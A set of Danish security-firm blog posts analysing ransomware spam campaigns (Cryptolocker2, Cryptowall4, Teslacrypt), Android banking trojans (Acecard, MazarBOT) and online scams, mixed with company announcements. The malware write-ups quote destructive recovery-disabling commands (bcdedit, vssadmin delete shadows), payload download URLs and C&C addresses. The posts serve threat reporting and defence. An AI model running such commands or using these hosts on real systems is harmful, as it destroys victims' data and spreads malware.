Der er ikke, i lighed med tidligere kampagner, et max antal begrænsninger for hentning af den skadelige kode, og det gør muligvis analyse af selve koden nemmere, men det øger samtidig risikoen for flere infektioner.

Det pågældende spamrun er rettet mod Skandinavien og er sprogtilpasset. Der er andre domæner som er oprettet for henvendelse Norge og Sverige, hvor lokkemaden er PostNord.

Den skadelige kode er Cryptolocker2 (crypt0l0cker). I lighed med tidligere, varianter, som vi har analyseret, vil denne ved kørsel kryptere data både lokalt og på delte netværksresourcer. Den sletter endvidere den lokale shadow copy.

Cryptolocker2 indeholder flere funktioner. Dels, så binder den maskinen ind i et BOTnet, hvor data sendes til omkring infektionen. Det inkluderer - men er ikke begrænset til: "computernavn", "IP adresse", "installationstidspunkt" og "BOTid". Vi har for længst blokeret alle disse domæner, samt mellemstationer og payload domæner i CSIS Secure DNS og Heimdal PRO/corporate.

I den sidste del af infektionen åbnes et ONION link til TOR. Her leveres instruktioner om hvordan man betaler for at genvinde de kidnappede data. Se skærmprint herunder.


På udsendelsestidspunktet var der yderst lav antivirus detektion af den skadelige kode (1/55)
https://www.virustotal.com/da/file/30ef75ebbbc7c27500dcbbf1db1aaab35be6a8e72e60a7a0ca91a621e4f62e6a/analysis/1443030595/

Vi har tidligere bragt en advarsel omkring disse yderst ondsindede spamkampagner:
https://www.csis.dk/da/csis/news/4726/

CSIS Blog: CSIS lancerer Academy kurser

0
0

Vil du dygtiggøre dig indenfor it-sikkerhed og undervises af de bedste og mest kompetente i markedet? Nu har du chancen!

Vi har lyttet til vores kunder og deres behov for uddannelse, og har netop lanceret følgende CSIS Academy kurser for 2016:

- Fraud analyst
- Infrastucture security
- Secure development.

Der er således noget for enhver smag, hvis man arbejder professionelt med it-sikkerhed. Kurserne spænder mellem opbygning af sikker og kritisk infrastruktur, sikker udvikling og programmering samt bekæmpelse og forbyggelse af svindel og elekronisk krimialitet.

lere oplysninger kan findes på vores hjemmeside:
https://www.csis.dk/da/academy/courses/

CSIS Nyheder: Er du sikker på nettet?

0
0

I dag har Finansrådet og Digitaliseringsstyrelsen i tæt samarbejde lanceret en kampagne som skal skabe mere awareness og forståelse omkring sikker internet adfærd.

Det er et faktum at alt for mange danskere bliver svindlet og snydt på nettet. Det skal denne kampagne gerne være med til at ændre på ved at påvirke vores adfærd, så vi bliver mere opmærksomme på de faldgruber som findes derude og som dagligt misbruges af it-kriminelle i phishing og andre fupkampagner.

Hos CSIS Security Group A/S støtter vi varmt dette initiativ, og håber det kan tjene til at skabe mere oplysning omkring it-sikkerhed.

Vi har i forbindelse med denne kampagne bearbejdet alt data, som vi har indsamlet i løbet af 2015 og som er relateret til phishing. Det kan bruges til at skabe et overblik over problemets omfang.


Grafen er baseret på CPR-numre afleveret af brugere på phishing sites i 2015, hvilket kun har været muligt at opsamle i en mindre del af tilfældene. Det samlede antal er 712 mænd og 602 kvinder.




Felix, som optræder i denne oplysningsvideo, har til anledningen fået udstedt et "licens til snyd". Klik på billedet herunder for at se videoen.


Kampagnens officielle webside kan findes på:
http://sikkerpaanettet.dk/

CSIS Blog: Ny iPhone 6 lokkemad

0
0

Værsgo en gratis iPhone 6? Skønt, ik? Men lyder det for godt til at være sandt? Det er det også. Der er en åbenlys catch!

Bag denne kampagne, som spredes viralt på Facebook via det tvivlsomme domæne (saniteret af CSIS): http://applecentral.xyz, står Orville Media. Kender i dem? De vil nemlig gerne lære dig at kende! Og ved lejlighed, indrulle dig i en omfattende abonnementskarusel, hvor du tilmed accepterer deres ublu vilkår.  

Men hvad fanger vores øje? Jo, det faktum at denne kampagne markedsføres viralt via Facebook (som er strid med Facebooks markedsføringspolitik) og ved brug af føromtalte domæne "applecentral.xyz". Dette domæne er beskyttet ved brug af tjenesten "whoisguard", så man ikke kan se ejeroplysninger. Hvorfor ville man gøre det, hvis der var tale om en legitim kampagne? Den slags koster nemlig ekstra!

Domain Name: APPLECENTRAL.XYZ
Domain ID: D11328258-CNIC
WHOIS Server: whois.namecheap.com
Referral URL:
Updated Date: 2015-10-26T12:12:57.0Z
Creation Date: 2015-10-26T12:12:54.0Z
Registry Expiry Date: 2016-10-26T23:59:59.0Z
Sponsoring Registrar: Namecheap
Sponsoring Registrar IANA ID: 1068
Domain Status: serverTransferProhibited https://icann.org/epp#serverTransferProhibited
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Domain Status: addPeriod https://icann.org/epp#addPeriod
Registrant ID: 4VPQU25IHRGCUYWS
Registrant Name: WhoisGuard Protected
Registrant Organization: WhoisGuard, Inc.
Registrant Street: P.O. Box 0823-03411
Registrant City: Panama

Et eksempel på hvordan du indrulles som "iPhone tester" hos Orville Media er illustreret herunder:


Vi har blokeret domænerne i CSIS Secure DNS og Heimdal PRO/corporate. Vi betragter dette som åbenlys bondefangeri.

CSIS Blog: Cryptowall4 i spambølge

0
0

CSIS har opsamlet en større spam kampagne, som via et vedhæftet zip-arkiv, og et obfuskeret javascript, vil forsøge at downloade malware/ransomware til maskinen. Det sker hvis indholdet aktiveres af en uforsigtig modtager og flere advarsler ignoreres. 

Den uønskede e-mail ankommer med følgende indhold:


Den pågældende .js fil vil forsøge at downloade tre filer fra forskellige kompromitterede websider (saniteret af CSIS)

http://babykucomel.com/wp-admin/js/73.exe
http://balwindersingh.in/bsdemo/js/73.exe
http://avtimespg.com/73.exe

Se skærmdump af obfuskeret og deobfuskeret javascript payload herunder:


En ny bølge af samme bande og med en ny/modificeret payload er sendt i omløb søndag morgen.

Hovedkomponenten er i Cryptowall klassen og dropper sig som "dwjxe-a.exe". Som alle moderne ransomware gennemfører den med det samme en række indgreb på maskinen, som skal besværliggøre gendannelse af systemet efter infektionen. Det sker ved at spawne følgende kommandoer:

bcdedit.exe /set bootems off
bcdedit.exe /set advancedoptions off
bcdedit.exe /set optionsedit off
bcdedit.exe /set bootstatuspolicy IgnoreAllFailures
bcdedit.exe /set recoveryenabled off
vssadmin.exe delete shadows /all /Quiet

Den kontakter herefter yderligere to domæner som anvendes til at indrulle maskinen i et BOTnet ved en GET request til /misc.php? på (saniteret af CSIS):

nhansu1000.net
oriindia.com

Ransomwaren forbinder sig automatisk til:
http://gfhshhf.home7dfg4.com/B186EFC31B48037

Denne URL giver ofret instruktioner om hvordan data kan købes tilbage. Se skærmdump.


Derudover droppes følgende filer indeholdende krav til ofret på den lokale maskine:

how_recover+fuv.htm
how_recover+fuv.txt

Filerne kopieres til windows start mappen, så de vises hver gang maskinen genstartes, eksempelvis:
C:ProgramDataMicrosoftWindowsStart MenuProgramsStartuphow_recover+fuv.htm

Cryptowall krypterer automatisk samtlige datafiler på maskinen.

Vi har blokeret samtlige af disse domæner i CSIS Secure DNS og Heimdal PRO/corporate.

Anbefalinger:
Generelt kan der gives flere råd omkring ransomware men det bedste råd er fortsat at udvise sund fornuft og ikke åbne indhold fra ukendt kilde. Derudover anbefaler vi at man installerer et software som kan hjælpe til at holde tredjepartssoftware opdateret. I den sammenhæng er vores klare anbefaling at man bruger Heimdal som kan hentes gratis til privat forbrug på https://heimdalsecurity.com

Det er IKKE en løsning at betale løsesummen. Det fodrer et voksende kriminelt marked og vil direkte medvirke til at problemet vokser sig endnu større end det allerede er.

Det sidste råd er at sikre at man til enhver tid har en opdateret backup af værdifuld data. Det ikke alene på grund af ransomware men af 1000 andre gode grunde!

CSIS Nyheder: CSIS medvirker til at nedskyde DorkBOT

0
0

DorkBOT er et IRC-baseret BOTnet, som har været persistent siden mindst 2011. Alene i Danmark har vi bekræftet ca. 2.400 inficerede maskiner, som med denne operation, er blevet løsrevet dette fjendtlige BOTnet og nu ikke længere er i risiko for datatyverier og medvirke i DDoS angreb mod DorkBOT udvalgte mål.

DorkBOT spreder sig via USB drev, instant messaging og sociale medier. DorkBOT er en informationstyv som målrettet også går efter online banker.

Med denne operation har CSIS i samarbejde med Microsoft, CERT.PL, ESET og flere andre samarbejdspartnere, delt intelligence med hinanden med henblik på at "sinkhole" DorkBOT og derved afmonte denne trussel.

Operationen blev effektueret i går, og pt. er DorkBOT lammet, og vil næppe være i stand til at genvinde de løsrevne BOTs, også selvom de fortsat er inficeret.

CSIS Threat Intelligence kunder vil løbende blive notificeret omkring infektion.

CSIS Secure DNS og Heimdal PRO/corporate kunder er allerede proaktivt beskyttet.

Yderligere oplysninger:
http://www.itworld.com/article/2732719/security/facebook-worm-spreads--formidable-set-of-malware--posing-as-blonde-women.html
https://www.csis.dk/en/csis/news/3387/

CSIS Nyheder: Teslacrypt rammer Danmark

0
0

CSIS har observeret en betragtelig stigning i infektioner forårsaget af en ransomware under navnet Teslacrypt. Teslacrypt er en "klon" af Cryptolocker2 og indeholder i grove træk de samme skadelige funktioner/egenskaber. Det er særligt private brugere, små- og mellemstore virksomheder samt offentlige institutioner som er i farezonen.

Den har i de seneste dage ramt flere danske virksomheder, og den fortsætter med at blive spredt via spammails og et vedhæftet zip arkiv som indeholder en .js fil der ved kørsel vil hente Teslacrypt fra flere kompromitterede websider. 

Den uønskede e-mail ankommer med følgende indhold (se skærmdump herunder). 


Ved kørsel, af en uforsigtig modtager, vil det medfølgende obfuskerede javascript forbinde sig til følgende URLs, hvorfra den skadelige hovedkomponent hentes og køres på systemet (saniteret af CSIS):

http://artskorat[.]com/html/images/69.exe?1
http://adopteuncompagnon[.]com/69.exe?1
http://aycenergy[.]com/wp/wp-includes/fonts/69.exe?1
http://46.151.52[.]197/69.exe?1

C&Cs:

--> http://kochstudiomaashof[.]de/media/misc.php
--> http://testadiseno[.]com/img/gal/thumb/misc.php
--> http://diskeeper-asia[.]com/tmp/misc.php
--> http://gjesdalbrass[.]no/media/misc.php
--> http://garrityasphalt[.]com/media/misc.php
--> http://grassitup[.]com/media/misc.php 

I næste fase vil der dannes en privat nøgle som bruges til at kryptere alle data på den lokale maskine samt tilgængelige netværksdrev ved brug af en AES-256-CBC algoritme med "session_priv" som nøgle. 

Koden, som er skrevet i C++ vil dernæst, som tidligere nævnt gennemsøge alle tilgængelige drev og kryptere samtlige filer med følgende filendelse:
.r3d .css .fsh .lvl .p12 .rim .vcf.3fr .csv .gdb .m2 .p7b .rofl .vdf .7z .d3dbsp .gho .m3u .p7c .rtf .vfs0 .accdb .das .hkdb .m4a .pak .rw2 .vpk .ai .dazip .hkx .map .pdd .rwl .vpp_pc .apk .db0 .hplg .mcmeta .pdf .sav .vtf .arch00 .dba .hvpl .mdb .pef .sb .w3x .arw .dbf .ibank .mdbackup .pem .sid .wb2 .asset .dcr .icxs .mddata .pfx .sidd .wma .avi .der .indd .mdf .pkpass .sidn .wmo .bar .desc .itdb .mef .png .sie .wmv .bay .dmp .itl .menu .ppt .sis .wotreplay .bc6 .dng .itm .mlx .pptm .slm .wpd .bc7 .doc .iwd .mov .pptx .snx .wps .big .docm .iwi .mp4 .psd .sql .x3f .bik .docx .jpe .mpqge .psk .sr2 .xf .bkf .dwg .jpeg .mrwref .pst .srf .xlk .bkp .dxg .jpg .ncf .ptx .srw .xls .blob .epk .js .nrw .py .sum .xlsb .bsa .eps .kdb .ntl .qdf .svg .xlsm .cas .erf .kdc .odb .qic .syncdb .xlsx .cdr .esm .kf .odc .raf .t12 .xxx .cer .ff .layout .odm .rar .t13 .zip .cfr .flv .lbf .odp .raw .tax .ztmp .cr2 .forge .litemod .ods .rb .tor .crt .fos .lrf .odt .re4 .txt .crw .fpk .ltx .orf .rgss3a .upk. Alle filerne omdøbes til .vvv eller .zzz og tilføjes et "blob" i headeren.

Som payload slettes den lokale shadow copy og følgende filer kopieres til alle mapper:

Howto_Restore_FILES.BMP
Howto_Restore_FILES.TXT *
how_recover+mln.html

Disse filer indeholder instruktioner om hvordan man ved betaling af Bitcoins kan opnå adgang til de krypterede data. Se skærmdump herunder.


Vi har naturligvis allerede blokeret for samtlige domæner i CSIS Secure DNS, ligesom vi har oprettet filtre der forhindrer inficerede maskiner i at forbinde sig til C&C serveren. Vores DNS blokkering forhindrer maskinen i at danne den private nøgle og vil derved forhindre selve krypteringen af data. Heimdal PRO og corporate kunder er også beskyttet mod denne trussel.

I denne kampagne skal løsesummen betales med Bitcoins via TOR og mere specifikt følgende links (saniteret af CSIS):

https://o7zeip6us33igmgw[.]onion.to
http://vrd463xcepsd12cd[.]crsoftware745.com
http://vr6g2curb2kcidou[.]expay34.com
http://tsbfdsv.extr6mchf[.]com/4CD6FA41D7BD8DA3

Vi fraråder, at man betaler løsesummen. Løsningen er at sikre sin perimeter og endpoints samt tilsikre, at en brugbar og funktionel backup strategi er på plads.

Vi har tidligere delt gode råd omkring ransomware og hvordan man bedst beskytter sig. Se tidligere platinum alerts for yderligere information, ligesom vi også tidligere har analyseret Teslacrypt.

Antivirus detektion er desværre lav:
https://www.virustotal.com/en/file/d8d14223267f5378f65bed1d5a0aa914a001c4d0aaebb7ff3b92a11e2ec3c7d5/analysis/1449666957/


CSIS Nyheder: Pas på Postnord spammails

0
0

I løbet af de seneste 3 dage har de it-kriminelle, som anvender Postnord og anden lokkemad i spammails, genstartet deres skadelige kampagner. 

Målet er at lokke vilkårlige modtagere til at klikke på et link som flytter trafikken til flere kompromitterede websider. CSIS har allerede blokeret flere end 100 domæner i CSIS Secure DNS relateret til disse nye kampagner. Payloaden er Cryptolocker2 og antivirus detektion er desværre yderst lav.

De ankommer med et indhold, som minder om tidligere spam kampagner, men det sprogmæssige indhold er imidlertid blevet lettere forfinet.

Et eksempel herunder:

Fra: [Spoofet / forfalsket afsender adresse]

Emnelinje:  

[%navn på modtageren%] Paketet inte har levererats (Norge)
[%navn på modtageren%] PostNord - Forsendelse Meddelelse (Danmark)
frakt Anmalan Forsandelse [postnummer] (Sverige)

Indhold: (skærmdump af indholdet er gengivet herunder)


Som det fremgår af ovenstående skærmdump, så gøres der brug af et link, som anvender en dynamisk genereret mappe på den kompromitterede server til at levere indholdet. 

Indholdet af mappen kan se ud som følgende:


Bemærk, at disse filer også dannes dynamisk. En analyse afslører at den pågældende payload, som leveres som en zip-fil, kun kan leveres en gang og at man fra de it-kriminelles side har blokeret flere IP adresser som CSIS anvender. Det er formentligt gjort for at besværliggøre vores analyser. Derudover leveres payloaden udelukkende til IP adresser i Skandinavien.

Et lille udsnit af domæner, som misbruges i det seneste spamrun, findes herunder (saniteret af CSIS)

romashka-plus[.]ru
goldcomfort[.]ru
fastparket[.]ru

Der er i alle de tilfælde, som vi har observeret, været tale om Joomla installationer som kompromitteres. 

Den fil der leveres er som nævnt pakket i zip. Den binære kode kamoufleres som et PDF dokument og leveres som "info_[5 vilkårlige tal].zip og hentes fra (saniteret af CSIS). 

downloader.disk.yandex[.]com

Denne binære kode er lettere modificeret fra tidligere og bærer flere og flere ligheder med Teslacrypt.

Man kan med god effekt blokere for ord der optræder i indholdet af disse spammails på sin email gateway. Der er flere ord i indholdet, som i kombination med hinanden, næppe vil blive sendt til danske virksomheder med legitime formål. 

CSIS planlægger at lancere en ny mailfirewall service i 2016 som i højere grad kan adressere disse mere og mere lokaliserede spamkampagner som internationale udbydere simpelthen ikke opsnapper tids nok. Mere om det i begyndelsen af det nye år.

I mellemtiden så uddan brugeren og varsko dem om disse skadelige PostNord kampagner og beskyt din infrastuktur med CSIS Secure DNS eller Heimdal PRO/corporate.

CSIS Blog: Android tyv fisker kreditkort

0
0

En Android informationstyv, som vi har døbt Acecard, også kendt som "Slembunk", spreder sig i forklædning af en Flash Player opdatering. Den leveres fra tvivlsomme websider, som ofret surfer ind på, eller på anden vis kan lokkes til at besøge.

Den uønskede APK (Android applikation) anvender websider, hvor Android brugere typisk søger efter applikationer eller søger efter pornografisk materiale. Et script, som er indsat på den pågældende webside, laver først et simpelt browser check (user agent), hvorefter applikationen tilbydes via browseren i smartphonen. Hvis ofret derfra kan lokkes til at installere den uønskede APK vil Android maskinen blive kompromitteret. Se skærmdump herunder af den trojaniserede Flash Player når den forsøges installeret:


Den pågældende applikation, som vi har analyseret, har følgende egenskaber:

Appnavn: Adobe Flash Player Update
Pakke: org.slempo.service
MD5: 288ad03cc9788c0855d446e34c7284ea
SHA-1: c8ba3108c7332146e7d3e3b7eaa5ba3194a351e5
Version: 3.4.543d
Signatur: CN=Android Debug, O=Android, C=US

Applikationen vil søge at opnå følgende rettigheder på enheden:

android.permission.CALL_PHONE
android.permission.GET_TASKS
android.permission.INTERNET
android.permission.READ_PHONE_STATE
android.permission.READ_SMS
android.permission.RECEIVE_SMS
android.permission.SEND_SMS
android.permission.SYSTEM_ALERT_WINDOW
android.permission.WAKE_LOCK

Mens den understøtter følgende funktioner (udsnit):

android.provider.Telephony.SMS_RECEIVED
android.content.pm.PackageManager.getInstalledApplications
android.telephony.SmsMessage.createFromPdu
android.telephony.SmsMessage.getOriginatingAddress
android.telephony.SmsMessage.getMessageBody

Den opmærksomme læser ser hurtigt, at denne APK er i stand til at opsamle SMS'er. Formålet er at omgå 2FA (2 faktor autentifikation). Derudover kan den indsamle data om opkald, numre og kontakter, applikationer installeret på enheden osv. En anden interessant detalje er, at angriberen til enhver tid, via den hardkodede C&C server (se skærmdump), kan udstede en wipe kommando: android.app.admin.DevicePolicyManager.wipeData


Den nye Acecard understøtter ikke færre end 21 sprog, herunder engelsk, tysk, dansk, spansk, portugisisk, svensk, norsk, finsk, hollansk, belgisk, italiensk osv.

Den binær APK afslører i udpakket stand at den laver et overlay af indholdet på mobiltelefonen hvor den foregiver at være en opdatering af Google Wallet. Her anmoder den ofret om kreditkort data (strengdump fra udpakket APK):

0009EFDD  Gadenavn
0009EFE8  Naviger op
0009EFF5  Flere muligheder
0009F00F  Opdater Google Play-tjenester
0009F02F  Adgangskode
0009F03D  Annuller
0009F046  Angiv den faktureringsadresse, som skal gemmes p
0009F07A   Google-kontoen.
0009F08D  Kontrolkode
0009F09B  Kortholderens navn
0009F0AE  Angiv de kreditkortoplysninger, som du vil bruge med Google Wallet.
0009F0F6  Ryd foresp
0009F102  rgslen
0009F10B  Efternavn
0009F11A  geforesp
0009F124  rgsel
0009F12C  Stemmes
0009F135  gning
0009F13D  Se alle
0009F14C  Del med %s
0009F159  Fornavn
0009F163  Del med
0009F16D  Telefonnummer
0009F184  Postnummer
0009F191  Kortnummer
0009F1F2   Google Wallet

Kommunikation med C&C serveren sker via funktionen:
org.apache.http.impl.client.DefaultHttpClient.execute (URL: "http://5.196.121[.]148:2080/", POST data

Den opretter en autostart funktion, så applikationen indlæses ved en genstart af mobilen: org.slempo.service.hujnkij8uijkjlmj;->onReceive (heraf navnet "Slembunk).

Udover at angribe kreditkort oplysninger, er den også på jagt efter online bank udbydere. En af de online banker, som er på "target listen" er dansk. Den pågældende bank er allerede underrettet om problemet igennem vores eCrime Services.

Vi har set flere Acecard varianter i de første uger af det nye år. Vi har allerede blokeret en stribe domæner der anvendes som download platform i CSIS Secure DNS og Heimdal PRO/corporate.

Et lille udsnit herunder (saniteret af CSIS):

xxxvideotube[.]org
f8gr8e8tg[.]com
australiamms[.]com
gexmails[.]com
brutalmobiletubes[.]com
adobeupdate[.]org

-> AdobeFlashPlayerUpdate.apk.

Acecard har udviklet sig markant i sofistikation i løbet af de seneste måneder og meget tyder på at dataindsamlende malware rettet mod smartphones vil stige i 2016.

CSIS Blog: Ny app hapser Facebook data

0
0

"Dagens Nyheder" er navnet på en viral app på Facebook, som lokker med spændende indhold som f.eks.:

Ny edderkoppeart fundet i Danmark. Graver sig ind under din hud og lægger æg
Nu stiger priserne på smøgerne; se hvor meget her.
Til foråret kan du bestille en charterrejse til lommepenge!
Er dette en flyvende tallerken?
Dansk belieber lægger sag an mod Christian's falske giveaway.
Kometen Satira, kan ses med det blotte øje i aften.
Nu bliver børnepenge sparet væk: se her hvor meget du mister
Du får muligvis ikke gavn af det danske sommervejr i år
Danmark står i vente for orkanen Heidi..
På grænsen til Sjælland: Nu er den første ulv blevet set

Se skærmdump, som eksempel herunder:

Den pågældende Facebook applikation opnår adgang til private data, som f.eks.:

Navn,
Køn
Alder
Lan
Email adresse

Det hele leveres via webssiden "vimulo.com" som igen ser ud til at være et aggressiv viral markerting stunt fra Larsen Medier. Fra websiden http://vimulo.com/betingelser.php hedder det:

Undersøgelsen udbydes af LarsenMedier, undersøgelsen har til formål at give dig kendskab til vores annoncører og deltagelse er derfor betinget af at du accepter at modtage markedsføring fra undersøgelsens sponsorer samt LarsenMediers nuværende og fremtidige samarbejdspartnere via e-mail.

Præmiens brand, sponsorer og andre selskaber nævnt i undersøgelsen har intet at gøre med opbyggelse af undersøgelsen, teknisk udvikling, konkurrencen eller andet. Derfor skal alle henvendelser vedrørende denne undersøgelse stilles til LarsenMedier

LarsenMedier
Præståvej 109D STTV
4700 Næstved
Denmark.
Email: larsenmedier@hotmail.com

Når du accepterer betingelserne bekræfter du, at du er over 18 år og, at du er bosiddende i Danmark.

Ved deltagelse bliver du automatisk tilmeldt vores sponsorers nyhedsbrev. Du kan dog max modtage nyhedsbreve fra 6 partnere som du til enhver tid kan framelde dig igen.

Her kommer listen over nyhedsbreve

Ditgavekort.net
Sweetwalls.dk
Avisa.dk
Dagligtnyt.dk

Du kan modtage henvendelser i kategorierne:

Lån
Helse
Telefoni
Konkurrencer
Bolig
Sport
Fagforening
Økonomi
A-kasse
Internet / bredbånd
Fordelsklubber
Rejser
Mode og skønhed
Magasiner / aviser
Postordre
TV
Velgørenhed
Forbruger analyse

E-mail adressen kan knyttes direkte til Patrick Larsen og Larsen Medier:
https://www.biq.dk/companies/LarsenMedier+v+Patrick+Larsen+Sv%C3%A6rke/17710770

CSIS har blokeret samtlige domæner i CSIS Secure DNS og Heimdal PRO/corporate. Selvom kampagnerne ser spændende og indbydende ud, så skal man ikke acceptere den pågældende app. Har man accepteret den, bør man med det samme gå ind i indstillinger på Facebook, og fjerne den pågældende app. Den optræder som "Dagens tilbud".

CSIS Nyheder: CSIS og SecureDevice inviterer til seminar

0
0

CSIS og SecureDevice inviterer til gratis seminar med fokus på IBM QRader SIEM og CSIS Security Analytics Centre (SAC) Proaktiv Incident Response. Seminaret afholdes i både København og Århus.

Efter stigende efterspørgsel fra kunder og samarbejdspartnere har CSIS valgt at udvide vores eksisterende "Security Analytics Center" (SAC) i hjertet af København. Målet med indsatsen er at etablere et globalt CSIS SAC center, der kan forene vores massive mængde intelligence og data, med en 24/7/365 netværksovervågning af nuværende og kommende kunder.

CSIS Security Analytics Center (SAC) tilbyder realtids overvågning af alle relevante sikkerhedshændelser i virksomhedens netværk, så der kan iværksættes rettidig og præcis incident respons på hændelser som bekræftes af CSIS SAC team.

Cybertrusler er i hastig vækst og angrebene bliver mere og mere raffinerede og målrettede. Det kræver i stigende grad, at virksomhederne forbereder sig på at kunne håndtere og imødegå et angreb, når det finder sted. Respons på et angreb skal ske hurtigt og rettidigt for at undgå tab af data og omdømme, afpresning, spionage m.v.

Allan Mortensen, Administrende direktør i CSIS udtaler: "Vi har i flere år drevet et operationelt Security Analytics Centre (SAC) på vegne af en stribe af vores større kunder. Vi har imidleretid indenfor de seneste 6 måneder, oplevet en stigende efterspørgsel på denne type service, hvorfor vi har opnormeret resoucer. Dette seminar er en perfekt lejlighed for eksisterende og nye kunder til at høre mere om hvad vi kan indenfor dette voksende område".

Formålet med det gratis seminar er følgende: 
- At give indsigt i CSIS SAC med henblik på at mindske perioden, fra man er blevet kompromitteret til det konstateres
- At anvende CSIS Security Intelligence til at optimere dit Incident Response når uheldet er ude
- At automatisere og outsource dele af sikkerhedsovervågningen til eksterne specialister


Program:

08.00 - 08.30
Morgenmad og registrering

08.30 - 08.40
Velkomst v. Michael Albek, SecureDevice

08.40 - 09.20
Trusselsbilledet anno 2016 v. Peter Kruse, CSIS Trusler og trends indenfor IT-sikkerhed imod danske virksomheder

09.20 - 10.00
Log Management, SIEM, SOC eller SAC? - v. Michael Albek, SecureDevice Gennemgang af de forskellige løsningsmuligheder, så din virksomhed bliver i stand til at træffe det rigtige valg

10.00 - 10.20
Pause og netværk

10.20 - 11.00
CSIS SAC - 24/7/365 v. Jan Kaastrup, CSIS Indblik i Danmarks ledende Security Analytics Center.

11.00 - 11.20
Paneldiskussion / Q & A's

11.00 - 12.00
Stående frokostbuffet med lette anretninger og netværk

Hvornår:
Holte: 1/3 2016 kl. 08.00-12.00
Århus: 14/3 2016 kl. 08.00-12.00

Tilmelding:
sacseminar@csis.dk. Angiv venligst om du ønsker at deltage i København eller Århus.

Om CSIS:
CSIS er den førende leverandør af anti-eCrime services i Norden, og samarbejder med alle de danske banker samt en række af de største finansielle institutioner og organisationer i Europa. CSIS Security Analytics Center (SAC) tilbyder 24/7 overvågning af alle relevante sikkerhedshændelse fra virksomhedens netværk (bl.a. IBM QRader)

Om SecureDevice:
SecureDevice er en specialiseret IT sikkerhedspartner og har modtaget talrige nationale og globale anerkendelser bl.a. fra IBM Security. SecureDevice har over 10 års erfaring med IBM's Security produkter bl.a. IBM QRadar og vi tør godt sige at ingen i Norden kender IBMs globalt markedsledende løsning bedre end os.

CSIS Blog: Danlotto.com fup

0
0

CSIS har observeret en ny svindel kampagne, som er gennemført på fejlfrit dansk. Den kan opfattes som troværdig men giv agt! Det gode tilbud sendes nemlig via e-mail til vilkårlige modtagere i Danmark. I den pågældende e-mail stilles du i udsigt at kunne "Få alle dine regninger betalt i hele 3 måneder!. Skønt, ik?! Næppe! Læs med her.

Den uønskede e-mail ankommer følgende indhold:

Det pågældende link peger på følgende URL (bemærk reference ID som kan knytte kampagnen til en lykkelig skurk):
http://karatetrophy[.]com/inter/link.php?M=21851&N=6&L=1&F=H

Whois giver os ikke meget:

Domain Name: karatetrophy.com
Registrar URL: http://www.godaddy.com
Registrant Name: Registration Private
Registrant Organization: Domains By Proxy, LLC

Dette domæne flytter trafik videre til websiden "danlotto.com" som ønsker, at du med det samme (og uden yderligere betænkningstid) tilmelder dig deres sprængtilbud, ved blot at indtaste dine kreditkort data:



De indtastede data valideres, udefra et simpelt check:


Nok sendes dine kreditkort data over SSL, hvilket er ok, men det er ingen garanti for, at du modtager det, som du forventer. Vi siger NEJ TAK og det samme burde du! Det ligner mest af alt en abonnement karrusel, og at dømme af anmeldelserne på Trustpilot bør man holde sig langt væk: https://dk.trustpilot.com/review/www.danlotto.com

Vi har blokeret begge domæner, i CSIS Secure DNS og Heimdal PRO/corporate, for at beskytte vores kunder mod potentielt misbrug.

CSIS Blog: MazarBOT angriber Danmark

0
0

CSIS har analyseret en SMS der sendes til vilkårlige mobilnumre i Danmark. Den pågældende SMS/MMS ankommer med følgende indhold (saniteret af CSIS):

"Du har modtaget en MMS-besked fra +45 29284572. Følg linket http://www.mmsforyou[.]net/mms.apk for at få vist beskeden."

Hvis den pågældende APK (som er en programfil til Android) køres på en Android mobiltelefon, så opnås der følgende rettigheder på enheden, såfremt ofret tillader det:

- SEND_SMS
- RECEIVE_BOOT_COMPLETED
- INTERNET
- SYSTEM_ALERT_WINDOW
- WRITE_SMS
- ACCESS_NETWORK_STATE
- WAKE_LOCK
- GET_TASKS
- CALL_PHONE
- RECEIVE_SMS
- READ_PHONE_STATE
- READ_SMS
- ERASE_PHONE


Vi har identificeret den skadelige APK til at være "Mazar Android bot" som observeret her af Recordedfuture i November 2015: https://www.recordedfuture.com/mazar-android-bot/

Den skadelige pakke henter TOR ned på telefonen via følgende uskadelige URLs:
https://f-droid.org/repository/browse/?fdid=org.torproject.android
https://play.google.com/store/apps/details?id=org.torproject.android

- udpakker og afvikler TOR applikationen, som skal bruges til at forbinde enheden til serveren: http://pc35hiptpcwqezgs[.]onion.

I næste fase sendes en SMS til nummeret: 9876543210 med tekstbeskeden "thank you". Denne indeholder også lokalitetsdata på enheden.

Skræmmende mobil malware med mange muligheder
Med de muligheder der åbnes her, er der stor risiko for mange former for misbrug. En ting er, at SMS beskeder kan afsendes til overtakserende numre. En anden ting er, at der åbnes for overvågning og kontrol af Android telefonen med de konsekvenser det kan have. En af de mest grimme funktioner, som denne malware understøtter, er opsamling af SMS'er. Det kan bidrage til at omgå 2FA (2-faktor autentifikation). 

Polipo proxy og MiTM
Ved at implementere "Polipo proxy" (https://github.com/splondike/polipoid) kan de udnytte et utal af funktionalitet. Det er muligt at ændre trafik og sætte sig imellem telefonen og en tjeneste. Det giver indlysende en stribe udfordringer, da det i realiteten bliver et MiTM angreb.

Filerne kopieres til mobilen som mp3 filer:

122,933 polipo.mp3
1,885,100 tor.mp3

Dertil følger konfiguration af proxy m.v.:

174,398 debiancacerts.bks
574 torpolipo.conf
879 torpolipo_old.conf
212 torrc
276 torrc_old

Konfigurationen af TOR proxy'en er pænt straight forward:

proxyAddress = "127.0.0.1"
proxyPort = 8118
allowedClients = 127.0.0.1
allowedPorts = 1-65535
proxyName = "127.0.0.1"
cacheIsShared = false
socksParentProxy = "127.0.0.1:9050"
socksProxyType = socks5
diskCacheRoot = ""
localDocumentRoot = ""
disableLocalInterface = true
disableConfiguration = true
dnsUseGethostbyname = yes
disableVia = true
from,accept-language,x-pad,link
censorReferer = maybe
maxConnectionAge = 5m
maxConnectionRequests = 120
serverMaxSlots = 8
serverSlots = 2
tunnelAllowedPorts = 1-65535
chunkHighMark = 11000000
objectHighMark = 128

Chrome injektion
Udover at kunne stoppe opkald og foretage andre aggressive kommandoer på mobilen er MazarBOT også i stand til at injekte sig i Chrome:


Flere andre indstillinger og kommandoer, som kommer med MazarBOT, kan blive observeret herunder:


Vil ikke køre på russiske Android telefoner
Vi lod os heller ikke videre overraske, da vi så at denne malware ikke lader sig installere på mobiltelefoner med russiske sprogindstillinger. Bemærk, at den laver en "checklocale" der vil stoppe applikationen såfremt mobiltelefonen er i russiske hænder.

locale.getCountry()
equalsIgnoreCase("RU"))
Process.killProcess(Process.myPid());

Mazar BOT er blevet annonceret til salg på flere undergrundssider, men det er første gang at vi har set denne kode blive misbrugt i aktive angreb.


Antivirus detektion af den skadelige APK er lav (3/54):
